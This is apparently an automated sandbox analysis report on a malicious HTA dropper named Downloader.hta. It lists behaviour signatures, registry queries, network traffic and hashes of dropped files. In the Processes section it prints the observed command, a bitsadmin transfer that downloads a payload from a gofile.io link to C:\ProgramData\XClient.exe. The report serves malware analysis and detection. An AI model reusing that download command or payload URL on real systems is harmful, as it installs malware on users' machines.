Malware Analysis Report

2024-10-24 20:51

Sample ID 240827-jdkd4a1eqm
Target Downloader.hta
SHA256 ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e
Tags
discovery dropper
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e

Threat Level: Likely malicious

The file Downloader.hta was found to be: Likely malicious.

Malicious Activity Summary

discovery dropper

Download via BitsAdmin

Checks computer location settings

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-27 07:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-27 07:33

Reported

2024-08-27 07:50

Platform

win10v2004-20240802-en

Max time kernel

436s

Max time network

438s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3296 wrote to memory of 4784 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3296 wrote to memory of 4784 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3296 wrote to memory of 4784 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://gofile.io/d/G6Wixe C:\ProgramData\XClient.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 gofile.io udp
FR 51.38.43.18:443 gofile.io tcp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/4856-1-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-3-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-2-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-13-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-12-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-11-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-10-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-9-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-8-0x000001345E940000-0x000001345E941000-memory.dmp

memory/4856-7-0x000001345E940000-0x000001345E941000-memory.dmp

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 7deb1c5ca7b35696ce4dff97b5bbf1c6
SHA1 6ed83ea50a26071d4d1e52608935d5d04892e8c1
SHA256 7151dc306e0ded55c326d2ca1e86f7097ec665a49ab61fcb8d16fc66db8fcc3d
SHA512 cf385c2c59ecba2e9d7c6484ad941728c91e1a3963612f8374e41d9bb17622945c49e4981b683227dafd388f5d69daaf892e3b7ef4157c0ec7a4b818b91880ae

C:\Users\Public\Desktop\Acrobat Reader DC.lnk

MD5 d430547f4c6d64c4f36053f42de1b4d0
SHA1 9e92d41693a134f3ac4fb06f7aba663c8c856115
SHA256 10b0351332b326d17b516202e0a5bdf2f793377db77c373547b1eb564942cee4
SHA512 ac3db5254d551c1864c1ae411c8d6f87435277e18c1f5642c6b36da013a30087e56f28b66a7b6128de98e5ea0f87a57f5fd9061c545a8beb85658db85819b6da

C:\Users\Public\Desktop\VLC media player.lnk

MD5 d90d015c1ee2f3ce05a221185a209f92
SHA1 13bf0ab97b52e901b3573dcea67f0be856f5f49d
SHA256 66261ef5bff2722cdafecdb7b705c22ace1bd18bd9c515bea4f9e177ccfe431b
SHA512 e854bbd237b8ba92150db6c4ab8cfdb0e48a42264d73a73c1f1dbd3cd7f988d3c493d2cde94f9b52cbfaad0b8d2acbee6baae457776c68831095ea3923e1ccb1

C:\Users\Public\Desktop\Firefox.lnk

MD5 b5b1db65ee4b5444f47f3ba856ba3a2c
SHA1 e26f2a2d3ce5c951d6540977e25eec2fc644b808
SHA256 7cf618a1e89f30170449a33a2ad7c8063970c71548beda7c31a808582cb8bce0
SHA512 27cee9c30552a6db9ce35d37e7207af7fdf1ef4db62bf2de712974976d3af8d8d0c1c2cd4624cb238daa4e26eb07147eb653a618630b9fa1daecba95d18c9607

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 506b5c060574b432deecfd9b8ce43ef5
SHA1 364f5adb90065d1df1c84c088e3248f8bd166dd9
SHA256 e41ff00c3bb1a2cfe3d73e11e9ef290fc69fb243bd0f6f34c4d337d98784a16f
SHA512 eede8f95a5ceb64ff58b5ebe314d8e80a8b291cb2e2ad51b080abf39a0163a9f19518d071095da50e0ad2e5c6df85b6d491a3d574132deb646ae40a07020699a

C:\Users\Admin\Desktop\BackupBlock.mpeg

MD5 31a961554550bc20d98f8d4bc2a2eb4a
SHA1 c54ba0d45613f6a9d2dd965911aec209ae81d84c
SHA256 b6c3592eb02c4442edec479e0a69ccf510d9bf3447935e0aa212e70dfd305a37
SHA512 8d4c4bf5ca8dd577efcb9b3a87cfaf46dc47b8da85960ab4f00c82c7701a0f3df9232d0e816e76e60d465770409e3390988162682588586fbb57ed45b3364824

C:\Users\Admin\Desktop\ConnectFormat.xlt

MD5 b0191b2d7cef4844ae7b4c1a5544b8a1
SHA1 df4000ed8ecd641a03d6da4096746d7acb0e241c
SHA256 4b80b7f7aa032b991524bd61679429fc6ca45df98e0079af82f24b16723f9ec0
SHA512 f985b913d60753f47ccbba801290c6753c031cc6f3203d866d0ec29ce8e5412b150c8aa8f270c323d5aaa0472b6533d61805f75b34a3d0ee5334c6d4127b336a

C:\Users\Admin\Desktop\ConnectCheckpoint.fon

MD5 3364bd77392aeb28314998c46b03291d
SHA1 9dbe19ca0ceef47e87b28abf3103fb074bb03f2f
SHA256 ad2ef332410d0a389473a94be70b1c5637a9af7695a7d6e33de89455a5d6db57
SHA512 d837be3fc459417530912da25f581364c105fbe42b8928fc1b3f7a39b86e352aba88b24d8fa4d404bb5cfd7517d1213cc44910d2f3fc5d16df6b1afdd5b8a108

C:\Users\Admin\Desktop\CheckpointStart.xlsm

MD5 7cf25f0c59a7d5762308c96fbd450f8f
SHA1 654aab086e03a0d679b9b3c12042cbf600b87da5
SHA256 b5dd655700966ccfba7bec45853555096288272631e22d303678e1eba3300164
SHA512 d1b92dd6905923f6b21ab2506675fff794fd326f2dca30d45eefec0065d8a9e4d085af95ce87923686017a5349c76be304948d762b256905c90bda6b20d45e7c

C:\Users\Admin\Desktop\CopyMount.mpeg2

MD5 a24cc5e62521870e7c38d9e80f9a2f29
SHA1 6e7e428d486eb7340937ef453452286279af3c27
SHA256 7d58dc4b0dbfd40d8e395f46f99045f34f521efab7b86941a889d621b9b8600d
SHA512 9cf0f03247b94f78fc16e1c6d2e930b6df2c155a3477733c587f8d888055c361fe6bda980a21cf8354412c09a5a1fc3cdee0992c5184ccd31f8252e894a41911

C:\Users\Admin\Desktop\InitializeRename.mp3

MD5 0fc1944f7f3a6105682e064e034b57dd
SHA1 274e92505f3b738f7a889c2a6f2afc50065ba765
SHA256 6ac937803105e4fc99ae6503b9219023bc62682e4461bde0d271d5b9950be66a
SHA512 b80259905850a4c5ffd3420ff4e2abae411089051506c65d1abd689131b5429f8a46033e75ddd87f797a688ecda9f311eb7141f7b13330fc5f53d3f4693d1451

C:\Users\Admin\Desktop\InvokeAssert.zip

MD5 3413700e5c085d38c9c397e1b05b6ac5
SHA1 7f4113b5f63afbbe0f092ba0bb2c5f64733c370d
SHA256 6482a724de2e83cc45d250273203f29fe4a30a563572cfac1696b1647133679c
SHA512 b96263f521ffb05b769add1c486b5d301bd6295e091c415bb17769380514e700e3d46f45116af8223f25258fdddd88ed1cdfcaa60de11a8d701010ffb9fd049c

C:\Users\Admin\Desktop\LockRestore.jpg

MD5 bbef9477bb378e2244eeab7e47779447
SHA1 a590dfd26a8f9f0f9bee079231b9e108cd646c1e
SHA256 6b777ec658803c6430d37109eff95d37e96bc3674251bb0e56011760302716af
SHA512 8ec52f0ed2c6e28dbe1403e3bd61569f809b5f452b160132f2c2da6299eb6c0ce1bfe905c64349991e26d35487605c18730e7ef935f69d05d0a51e08db1496d5

C:\Users\Admin\Desktop\MeasureCheckpoint.ico

MD5 23114327ef8a993a9cd6ed124d64f1d4
SHA1 86fcf88e115b435f61de3661517bee9d8fa48d6d
SHA256 60ef38c99c289a6567c07fa91a18c9bc96d339c2899300eb6b393cdf65d4f071
SHA512 972561e0fd3cfb304867ac5dd964092c5b91af47bdf0c99e0d269dea96c612d9a736cc3e7bbce043074cb73c552e3a51beb4882c6590ec07d7ba32886ba2e10d

C:\Users\Admin\Desktop\OpenPop.xht

MD5 6e4f1bd7a03f9f6f4a56459b9ee0a8cf
SHA1 31f4b269b221d5ff6557b0289a3c6c41f5110210
SHA256 79307b5fb6fc89dcdd1fd65e960398e764b4eb6aaf0c0190615dfe43a7c99463
SHA512 03d13b4296b47d4e3c0fcf984f8af2e0b8b4c8b954f4b419766385408311e1cc7a2066bcfc808bfecb3755919b56147525c36bfe41abae5e508f1b89b0efad5a

C:\Users\Admin\Desktop\MergeCopy.otf

MD5 053dba12b4871ee25090cd330e4fb860
SHA1 2d75ecf39d9f1fc04c30556f77ac91609fdadaaf
SHA256 7fcad3c9a9d66f09e8ff310658c3434050c5a9c9a7fabc5bf8981ce5f93f685a
SHA512 cf7b7ab0ec26e2a06aee0a0ba6a47f434e8b9b4c40964ce3c0b1161a32717dfd1a88270b310742e23499073b54844b58043d7a09f09b71247aa4f2f5f9805821

C:\Users\Admin\Desktop\PingEnable.avi

MD5 1ff53171f76bfce6a7664fd789db639b
SHA1 33adcaf96039b929a196bd9eb21489c95663da5e
SHA256 610ec195d3419d7cf235a87eeca086fb953d90bfb91995c56fff5b2fa46ff47b
SHA512 510cdb0957a3a9a6c929dedec194e4ad47c725a40854f4303e88e62701bedd4dd60965f18e981f91d8483e241a5cabe379f3f505cf47e8d45caac27b24be8bba

C:\Users\Admin\Desktop\ReadExit.hta

MD5 29553d5a7ceef758ec9060430b4b0361
SHA1 509f59067d571fbf863eb6ccf6cfa89b0939fca4
SHA256 3866a1665b992bba5edd9dd5dae5e3140b84337a044101f18480b4783fa16c68
SHA512 7974166ae431d92276b995aea86405bcd5d1d9f4529d738f231da1829c9a3d4b1ac2f1de9a4a377055a4a9baf05e85b45a654e54a70e4bc86b7e8996ed8b5322

C:\Users\Admin\Desktop\PublishRestore.xhtml

MD5 2cfe3191919b6e2d5b1b1f4e6ebf3495
SHA1 a98d3a6fc91a28096694c093f14b4baf9ad3ba47
SHA256 b9833241cd68bdb9d51b351bd7ab42dae89db1425a34fd6ba6553eff70d5abd4
SHA512 de2e49e5f0c1ad44c06aff41b1a6c23fa03385e364f02569e051c20a1149227c5b936ee99e6b23a07e85ab67c1faf55647e4fd187e78027fc7b8be0936a63858

C:\Users\Admin\Desktop\PublishApprove.mpe

MD5 9154cfde9cc004bea75f38ac5185448a
SHA1 17fedbd4f298c68f5a941249ddf05a40a3c955cc
SHA256 196f09d684a985dbcdacc883a4916a4d909c7f5f66265190de948afd5acc188d
SHA512 13fe5443db643b027d4eca5596b4165b80e8ad8bd19cb2534a39c7a51f0978b30bed2399f8815e2dc6de73f2840c456805c924ab5eaf44d42cd22c492fa8f75d

C:\Users\Admin\Desktop\RenameLock.bmp

MD5 55869ca111b70a9a1a131a9313a329c6
SHA1 6e0b234551baaa25e627a729b166ec32102bee1f
SHA256 068ec3b044c25c83240d62a2f39b70c7956bbcea7f30d560830e3aafcc54449d
SHA512 732064f8ac16b90e0155aa6b4765e5e6c813733192182ecbc8cacb41734982924f8abe862a4a882725f2eac4aa162ccdd485d9af96bce5bf48edc60db905df93

C:\Users\Admin\Desktop\RevokeSend.html

MD5 e6fa18e12e26d2b050465d26a7bc120d
SHA1 570a651c4efb13d51a6cacb1c35022bead84d16a
SHA256 5d81dba4b3d860c0354191f673d4a0f6aa3fe50b2fcf2ce811a38a7ed55f4934
SHA512 ebe0881ce15de964ab317d08c489d8093a6e2b068a18515706864f96831a856c46ab68330b31bdd95431e6e34f4808b9ac055363002e58398d1dd2e6191c24f7

C:\Users\Admin\Desktop\SelectUndo.htm

MD5 c39141171f51cf1b73ed5c6889c9c9d6
SHA1 8f5e7d89e86927bbb057606810e29c2c5c5a8f90
SHA256 c2aabc75edbe7b93ca8941ef1dce07472367053cc198deb406bff57dddba4de7
SHA512 5f7322bbafcae996011a10e0188cb4a18a012f611f762f5ef5a97a12f75d9030b4ff66a1c4db1af18a5bad44db368ec4ac74cc8129895bbfb1457e330e265b2c

C:\Users\Admin\Desktop\SendMove.potm

MD5 690b6d9b156632bee7650f19d3251c0a
SHA1 2611e3a72c4402a7f7641fd9fdd06a64491d706f
SHA256 96b91a05863c88ba0ad2ed9fb69f2fce5313eda50094d52bfd27b4cd78d8e441
SHA512 19ddfea8f2e7c92188675c1f7cd771b73c784b106f6d01a54db041a90a52adb20d7c37897504f694b9185b55992acad7f183d0a082d2a83fe81142cd997d546e

C:\Users\Admin\Desktop\UnprotectDismount.fon

MD5 2ca871b517a85333e5383d914ac4c48a
SHA1 8481c730ad9e50bb51abeb4555902760841ae1a4
SHA256 9d417d8bd6835e8882dcbbb78f762554124f480b68285a9e7065e66344875022
SHA512 298b8ca23a54aaa96275293dba5f0f5e0bd16f1befb03065abbf728493aed9cf80b6584dfa4e61071f5c502eab35dc173b9d13ee73550969844907ff81ec0cb6

C:\Users\Admin\Desktop\AssertReceive.svgz

MD5 57bbe8f2a84b0af27b664561c704a5f5
SHA1 5e69a282fc0faa72133b2fa210922b15c91a3d3d
SHA256 f4196af133eb20259d992c006b213869f01270edd6b0689f9a1df8ae784f1a00
SHA512 5c8bfbb0422ce2e85dd4b798cc5aa98f2756a1d9ed2e6c38bdf7611cea265b59b081edfba09ed070555b7d118d405b39469161b25980f27e52b5d0b4e67bdca6

C:\Users\Admin\Desktop\MoveLock.au

MD5 869b921da3b35dfdc8be3f925125fd8c
SHA1 27ad0f1fe480a8f8c4dbcb8515a5248fb7f5255a
SHA256 2dabeded46918a45a40905eb3af723ec1abcaaa742a168b5a3c8098bd74f2edb
SHA512 2f1b00e7c892d5777e58dc713574835541e01d1ec6a771964660a99c0d247d2bf66199105a1bc91cffac32cf32d01834e44cc8691090f9de5504af7b5ca82a50

C:\Users\Admin\Desktop\ExportEnable.mpp

MD5 fb1d0702d40ff962c7b16168dd6a07bc
SHA1 266bbcafa5d7fab64657b7f4c1c10ad3a2548a5b
SHA256 d47b1bf9bf1383f9deb010b0fdebd6e27a552c12751e5705865e69241b32c657
SHA512 17884689cd3b86e8190ddfe0e683a5f50287f8ff98da24b0f4edf3addd5b902957d3df13dc44714c5782506c7b3ccdb3557c096c971ab574bedbbe686f222796

C:\Users\Admin\Desktop\StepMerge.docx

MD5 77e2ad97e17d175237573de11920dd17
SHA1 40a9eb49ccbe64c5d3231c465871bfbd2531c89d
SHA256 e3d39f004cbc6c8869d68c5ccef3a1904315553d1bf3b6565804989850babdb3
SHA512 3fce3beb4277ecd407f93d882c5349469d340574a30cb348efce6f78726bfc90998b5c54f1041d8a3ade299c03493a47301dd12f113c76643b1b3bb55c5301f8

C:\Users\Admin\Desktop\RedoFind.xml

MD5 ab03eee998a114f5ffb93a85f58dc6cc
SHA1 79e34ad28f3ac1020f27171e265ca55ee9072fa0
SHA256 afd5380c81b51f9d702cf78f7ed481b47dd6ec9c8e0da1ccc87e69c10658764d
SHA512 14adf82576881861585ce9dab6be6c413ae530f9122b51fdb2139c29953b6463e55b8249e1c9de50f339c08f89cf742d1a03c9c3f66945a931e4edbd5dbbd836

memory/3816-45-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

memory/3816-44-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

memory/3816-46-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

memory/3816-51-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

memory/3816-56-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp

